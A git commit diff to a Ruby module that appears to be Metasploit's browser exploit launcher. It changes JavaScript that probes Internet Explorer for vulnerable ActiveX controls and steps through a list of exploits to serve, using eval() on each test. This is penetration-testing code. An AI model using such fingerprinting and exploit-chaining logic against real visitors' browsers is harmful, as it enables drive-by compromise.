Puts testAXO() on window so we can access it from anywhere
Also uses the new :method property which allows an array syntax. See ie_createobject for a usage example.
This commit is contained in:
parent
f9a48ace48
commit
afe28523f3
|
@ -230,24 +230,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ENDJS
|
ENDJS
|
||||||
|
|
||||||
if (datastore['DEBUG'])
|
if (datastore['DEBUG'])
|
||||||
print_status("Adding debug code")
|
print_debug("NOTE: Debug Mode; javascript will not be obfuscated")
|
||||||
@init_js << <<-ENDJS
|
|
||||||
if (!(typeof(debug) == 'function')) {
|
|
||||||
function htmlentities(str) {
|
|
||||||
str = str.replace(/>/g, '>');
|
|
||||||
str = str.replace(/</g, '<');
|
|
||||||
str = str.replace(/&/g, '&');
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
function debug(msg) {
|
|
||||||
foo = document.getElementById("foo");
|
|
||||||
bar = document.createTextNode(msg);
|
|
||||||
foo.appendChild(bar);
|
|
||||||
bar = document.createElement("br");
|
|
||||||
foo.appendChild(bar);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
ENDJS
|
|
||||||
else
|
else
|
||||||
pre = Time.now
|
pre = Time.now
|
||||||
print_status("Obfuscating initial javascript #{pre}")
|
print_status("Obfuscating initial javascript #{pre}")
|
||||||
|
@ -424,20 +407,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if apo[:classid]
|
if apo[:classid]
|
||||||
# Then this is an IE exploit that uses an ActiveX control,
|
# Then this is an IE exploit that uses an ActiveX control,
|
||||||
# build the appropriate tests for it.
|
# build the appropriate tests for it.
|
||||||
method = apo[:vuln_test].dup
|
|
||||||
apo[:vuln_test] = ""
|
apo[:vuln_test] = ""
|
||||||
apo[:ua_name] = HttpClients::IE
|
apo[:ua_name] = HttpClients::IE
|
||||||
|
conditions = []
|
||||||
if apo[:classid].kind_of?(Array) # then it's many classids
|
if apo[:classid].kind_of?(Array) # then it's many classids
|
||||||
apo[:classid].each { |clsid|
|
apo[:classid].each { |clsid|
|
||||||
apo[:vuln_test] << "if (testAXO('#{clsid}', '#{method}')) {\n"
|
if apo[:method].kind_of?(Array) # then it's many methods
|
||||||
apo[:vuln_test] << " is_vuln = true;\n"
|
conditions += apo[:method].map { |m| "testAXO('#{clsid}', '#{m}')" }
|
||||||
apo[:vuln_test] << "}\n"
|
else
|
||||||
|
conditions.push "testAXO('#{clsid}', '#{method}')"
|
||||||
|
end
|
||||||
}
|
}
|
||||||
else
|
|
||||||
apo[:vuln_test] << "if (testAXO('#{apo[:classid]}', '#{method}')) {\n"
|
|
||||||
apo[:vuln_test] << " is_vuln = true;\n"
|
|
||||||
apo[:vuln_test] << "}\n"
|
|
||||||
end
|
end
|
||||||
|
apo[:vuln_test] << "if (#{conditions.join("||")}) {\n"
|
||||||
|
apo[:vuln_test] << " is_vuln = true;\n"
|
||||||
|
apo[:vuln_test] << "}\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
# If the exploit supplies a min/max version, build up a test to
|
# If the exploit supplies a min/max version, build up a test to
|
||||||
|
@ -670,7 +654,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# two methods should succeed if the object with the given
|
# two methods should succeed if the object with the given
|
||||||
# classid can be created.
|
# classid can be created.
|
||||||
js << <<-ENDJS
|
js << <<-ENDJS
|
||||||
function testAXO(axo_name, method) {
|
window.testAXO = function(axo_name, method) {
|
||||||
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
||||||
axobj = document.createElement("object");
|
axobj = document.createElement("object");
|
||||||
axobj.setAttribute("classid", "clsid:" + axo_name);
|
axobj.setAttribute("classid", "clsid:" + axo_name);
|
||||||
|
@ -691,7 +675,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
try {
|
try {
|
||||||
axobj = new ActiveXObject(axo_name);
|
axobj = new ActiveXObject(axo_name);
|
||||||
} catch(e) {
|
} catch(e) {
|
||||||
axobj = '';
|
// If we can't build it with an object tag and we can't build it
|
||||||
|
// with ActiveXObject, it can't be built.
|
||||||
|
return false;
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
||||||
|
@ -699,7 +685,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
return false;
|
return false;
|
||||||
}
|
};
|
||||||
ENDJS
|
ENDJS
|
||||||
# End of IE-specific test functions
|
# End of IE-specific test functions
|
||||||
end
|
end
|
||||||
|
@ -719,9 +705,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
document.body.innerHTML += (str);
|
document.body.innerHTML += (str);
|
||||||
}
|
}
|
||||||
window.next_exploit = function (exploit_idx) {
|
window.next_exploit = function (exploit_idx) {
|
||||||
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
|
||||||
if (!global_exploit_list[exploit_idx]) {
|
if (!global_exploit_list[exploit_idx]) {
|
||||||
#{js_debug("'End'")}
|
#{js_debug("'End<br>'")}
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||||
|
@ -739,8 +725,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
//document.body.appendChild(tn);
|
//document.body.appendChild(tn);
|
||||||
if (!test) {
|
if (!test) {
|
||||||
test = "true";
|
test = "true";
|
||||||
} else {
|
|
||||||
test = "try {" + test + "} catch (e) { is_vuln = false; }; is_vuln";
|
|
||||||
}
|
}
|
||||||
|
|
||||||
if (eval(test)) {
|
if (eval(test)) {
|
||||||
|
|
Loading…
Reference in New Issue